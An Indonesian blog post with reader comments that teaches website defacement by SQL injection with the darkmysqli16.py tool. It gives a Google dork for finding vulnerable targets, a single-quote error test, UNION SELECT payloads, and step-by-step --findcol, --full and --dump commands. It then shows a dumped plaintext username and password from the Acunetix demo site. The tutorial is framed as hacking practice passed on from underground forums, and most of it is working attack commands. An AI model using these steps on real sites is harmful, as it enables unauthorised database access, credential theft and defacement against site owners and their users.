deface dengan darkmysqli16.py

mari kita mencoba belajar deface website dengan metode SQL injection. Kali ini saya akan mengshare sedikit pengetahuan yang saya dapatkan dari beberapa forum2 underground.

oke kita mulai. oiya, dalam deface website dengan metode SQL Injection setahu saya dapat dilakukan dalam 2 cara, yaitu dengan cara manual dan dengan menggunakan darkmysqli16.py yang menggunakan bahasa python.

deface menggunakan cara manual, dapat dilakukan tanpa menggunakan software, dan dapat mengandalkan kemampuan browser saja. Sedangkan jika menggunakan darkmysqli16.py di haruskan kita memiliki software python yang kita gunakan untuk mengexplorer darkmysqli16.py sehingga dapat bekerja dengan baik untuk melakukan injection.

Langkah2 deface menggunakan darkmysqli16.py:
di haruskan anda memiliki dan menginstall python, saran saya yang versi 2.5, dapat di peroleh di sini, dan script darkmysqli16.py dapat di downoad di sini.

cara ini saya dapatkan dari tulisan kak vir0e5 di forum TECON-CREW.
Ini cuma buat latihan yang mau nyobain darkmysqli16!
untuk mencari target kita dapat menggonakan dork google, misalnya “inurl:artists.php?id=” (tanpa petik),

dan ita mendapatkan target:
http://test.acunetix.com

Untuk tutorialnya hampir mirip dengan schemafuzz.py

langsung ke TKP
http://test.acunetix.com/

Cari yang vuln… kebetulan saya nyoba yang
http://test.acunetix.com/artists.php?artist=1
jangan lupa tambah single quote (‘), untuk mengetahui ERROR nya..

To the point langsung menggunakan darkmysqli16.py

Cari column
dengan perintah

–findcol
exp: darkmysqli16.py -u “http://test.acunetix.com/artists.php?artist=1” –findcol
akan terlihat seperti ini:
--findcol

kemudian, setelah dapet injekkannya

darkMySQLi URL: http://test.acunetix.com/artists.php?artist=1+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de–

karena udah tau ada 3 column jadi di buat singkat menjadi
http://test.acunetix.com/artists.php?artist=1+AND+1=2+UNION+SELECT+1.darkc0de,3–”

Masukin dech perintah

–full

exp:
darkmysqli16.py -u “http://test.acunetix.com/artists.php?artist=1+AND+1=2+UNION+SELECT+1,darkc0de,3–” –full

untuk enumerasi nya
hasilnya kaya gini

--full

setelah dah dapet…

Database dan columnya semua…
masukin

–dump -D (Nama database-nya) -T (nama table-nya) -C (nama file / kolom-nya)

Exp:
darkmysqli16.py -u “http://test.acunetix.com/artists.php?artist=1+AND+1=2+UNION+SELECT+1,darkc0de,3–” –dump -D acuart -T users -C uname,pass

Hasilnya kaya gini:
--dump

ada yang terencrypt dan ada yang ngga

saya masukin yang ga terencrypt

http://test.acunetix.com/login.php
gopala : gopala

hasil

semoga bemanfa’at..dan terus dikembangkan!!

hihihi…

Special thank’s for kak vir0e5 dan tecon-crew
and all of my friend vhesckot_1601 – zee_eichel – chaer.newbie – [Joker][K] – SaruKusai – v4lc0m87 – Spy_Gjlas – astroboyyy – habibiDXXX – MISTERFRIBO – skutengboy – Rapc0d – derril_0101 – ian182 – c4ur – ne0_d4rk_fl00d3r – harukanata – @whcoy – thunder_XcOde – bluescreen – bl4ckfl4g – orank_an3h – bejosableng_212 – wongrantau – enterdeath – uoopoh – juffrez – z3nd3nx

6 Tanggapan

  1. keren kk..nice artikel

  2. makasih kk buat sanjungannya, artikel itu bukan murni tulisan saya, tapi tulisan kak vIr0es di Forum TECON-CREW, n’pernah juga saya coba n’berhasil.. xixixi….
    thx bget ya kk….

  3. waduh di posting….. hihi..makasih ^^

  4. hihihi….. makasih buat materninya yah om… hihihi…

  5. wew.. keren nih ,,, memang kk vir05 … heheh tapi itu link tecon di benerin ya l…. hehehhe

    sekarang kita maen di http://home.tecon-crew.org/

    thx

  6. siap kang zee… dah lama ane gak maen ke tecon.. hihihi….

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: